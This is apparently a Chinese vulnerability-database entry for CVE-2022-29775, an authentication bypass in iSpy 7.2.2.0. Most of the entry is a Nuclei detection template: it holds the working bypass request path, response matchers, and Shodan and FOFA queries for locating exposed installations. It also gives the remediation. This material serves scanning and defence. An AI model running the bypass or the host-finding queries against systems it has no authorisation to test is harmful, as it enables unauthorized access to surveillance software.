CVE-2022-29775: iSpy 7.2.2.0 - Authentication Bypass

日期: 2025-08-01 | 影响软件: iSpy | POC: 已公开

漏洞描述

iSpy 7.2.2.0 contains an authentication bypass vulnerability. An attacker can craft a URL and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.

PoC代码[已公开]

id: CVE-2022-29775

info:
  name: iSpy 7.2.2.0 - Authentication Bypass
  author: arafatansari
  severity: critical
  description: |
    iSpy 7.2.2.0 contains an authentication bypass vulnerability. An attacker can craft a URL and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the system.
  remediation: |
    Upgrade to the latest version of iSpy (7.2.2.1 or higher) which includes a fix for the authentication bypass vulnerability.
  reference:
    - https://gist.github.com/securylight/79f673aa3a453c80c0e78f356a8f650b
    - https://github.com/securylight/CVES_write_ups/blob/main/iSpy_connect.pdf
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-29775
    - https://nvd.nist.gov/vuln/detail/CVE-2022-29775
    - https://github.com/securylight/CVES_write_ups
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-29775
    cwe-id: CWE-287
    epss-score: 0.5275
    epss-percentile: 0.97871
    cpe: cpe:2.3:a:ispyconnect:ispy:7.2.2.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: ispyconnect
    product: ispy
    shodan-query:
      - http.html:"iSpy is running"
      - http.html:"ispy is running"
    fofa-query: body="ispy is running"
  tags: cve,cve2022,ispy,auth-bypass,ispyconnect

http:
  - method: GET
    path:
      - '{{BaseURL}}/logfile?d=crossdomain.xml'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Log Start'
          - 'Log File'
          - 'iSpy'
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100fb1e638c0d62e9398645e99aa8dad992aef0b16d757aa429535f2132cacff4d702206e983e5beefdc4cc2ec45d5972a001e98a0531cc685f4e1d88be1ca8ffe12a9b:922c64590222798bb761d5b6d8e72950

相关漏洞推荐